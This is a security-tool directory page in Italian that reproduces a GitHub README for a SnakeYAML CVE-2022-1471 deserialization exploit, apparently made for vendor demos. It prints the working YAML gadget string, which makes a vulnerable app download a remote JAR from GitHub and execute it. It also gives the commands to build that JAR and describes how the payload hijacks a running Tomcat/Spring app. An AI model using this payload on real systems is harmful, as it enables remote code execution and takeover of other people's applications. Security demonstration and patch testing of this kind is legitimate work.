Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
yaml-payload-2 — SnakeYAML CVE-2022-1471 payload di exploit per le demo di Seal Security | Kitploit
Strumenti/GitHubGitHub/seal-sec-demo-2/yaml-payload-2
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRed TeamingSviluppo Payload
GitHubseal-sec-demo-2/yaml-payload-2

yaml-payload-2

SnakeYAML CVE-2022-1471 payload di exploit per le demo di Seal Security

Vedi Repository
52 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

yaml-payload

Un payload di sfruttamento della deserializzazione SnakeYAML per CVE-2022-1471, adattato da artsploit/yaml-payload (originariamente basato su mbechler/marshalsec).

Cosa fa

Quando viene caricato tramite il metodo non sicuro Yaml.load() di SnakeYAML, questo payload prende il controllo dell'applicazione in esecuzione e la sostituisce con una pagina "You've Been PWNED":

  1. Inietta una Tomcat Valve nell'app Spring Boot in esecuzione tramite reflection, dirottando la porta 8080 esistente — lo stesso URL (incluso qualsiasi tunnel ngrok) ora serve la pagina PWNED
  2. Reindirizza automaticamente il browser — la risposta POST invia un redirect 302, quindi il browser carica immediatamente la pagina PWNED senza un aggiornamento manuale
  3. Apre automaticamente il browser sull'URL corretto (URL pubblico ngrok se disponibile, altrimenti localhost:8080)
  4. Stampa le prove dello sfruttamento nella console/log CI

Se l'iniezione della Tomcat Valve non è disponibile (ad es. app non Spring), ripiega sull'avvio di un server HTTP autonomo sulla porta 9999 e crea automaticamente un tunnel ngrok se ngrok è in esecuzione.

Funziona sia localmente su macOS che nelle pipeline CI/CD (ad es. GitHub Actions su Ubuntu).

Come funziona la catena di sfruttamento

Il payload SnakeYAML attiva ScriptEngineManager tramite lo SPI Java (Service Provider Interface):

root@kitploit:~
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://raw.githubusercontent.com/seal-sean-org/yaml-payload/main/yaml-payload.jar"]]]]
  1. SnakeYAML istanzia java.net.URL che punta al yaml-payload.jar di questo repository
  2. Lo avvolge in un URLClassLoader per caricare classi remote
  3. ScriptEngineManager scopre e carica AwesomeScriptEngineFactory tramite META-INF/services/javax.script.ScriptEngineFactory
  4. Il costruttore della factory inietta una Valve nella pipeline Tomcat in esecuzione, sostituendo ogni risposta successiva su / con la pagina PWNED

Build

Richiede JDK 17+:

root@kitploit:~
javac -d build src/artsploit/AwesomeScriptEngineFactory.java
cp -r src/META-INF build/
cd build && jar -cfv ../yaml-payload.jar . && cd ..

Utilizzo

Usato come payload di sfruttamento nel progetto maven-demo. Incolla la stringa del payload nel campo nome dell'app per attivare l'RCE. La pagina dell'app verrà sostituita con la pagina PWNED alla richiesta successiva. Consulta il README di quel repository per le istruzioni complete della demo.

Scarica lo strumento